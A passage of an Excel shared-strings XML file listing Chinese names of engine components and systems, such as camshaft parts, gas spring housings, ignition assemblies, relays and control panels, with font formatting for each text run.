        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料和硬化</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接部分</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴中间</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动凸轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>几何公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气体弹簧导壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气体弹簧盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴机架中截面</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>整流器体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向气缸薄垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套装置壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套装置壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴盖上端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴盖下端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回流管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底部塞子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>剪螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压安全阀块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构毂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向臂止推轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑动套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋叶</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器销规</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴销规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱附件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>远程温度计支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装和启动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速参考手册</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护罩</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触发环工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触发器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>点火系统总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线盒安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机控制面板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力计支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆支架安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助触点</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器面板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模拟计算机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发火电缆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>点火线圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>火化塞延伸部分</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>按钮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序核对表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警面板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂滑油系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>处理界面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导线管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动和喷射系统箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射系统箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管连接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热动继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水平开关安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀控制箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电容器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒压器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示盒（盒）</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔离放大器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>校准曲线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预润滑油泵启动器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>继电器箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴冷却泵启动器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温器布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用起动器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
